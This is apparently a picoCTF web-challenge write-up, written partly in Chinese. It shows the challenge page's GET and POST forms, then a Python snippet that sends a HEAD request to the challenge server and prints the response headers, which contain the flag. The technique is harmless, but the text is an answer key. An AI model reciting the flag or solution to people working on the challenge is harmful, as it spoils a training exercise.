Description

Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/

Solution

看HTML發現有兩種請求方式

GET 和 POST

<div class="col-md-6">
    <div class="panel panel-primary" style="margin-top:50px">
        <div class="panel-heading">
            <h3 class="panel-title" style="color:red">Red</h3>
        </div>
        <div class="panel-body">
            <form action="index.php" method="GET">
                <input type="submit" value="Choose Red"/>
            </form>
        </div>
    </div>
</div>
<div class="col-md-6">
    <div class="panel panel-primary" style="margin-top:50px">
        <div class="panel-heading">
            <h3 class="panel-title" style="color:blue">Blue</h3>
        </div>
        <div class="panel-body">
            <form action="index.php" method="POST">
                <input type="submit" value="Choose Blue"/>
            </form>
        </div>
    </div>
</div>

嘗試使用HEAD請求

import requests

url = "http://mercury.picoctf.net:47967/index.php"

response = requests.request("HEAD", url, headers={}, data={})

print(response.headers)

找到flag

{'flag': 'picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}', 'Content-type': 'text/html; charset=UTF-8'}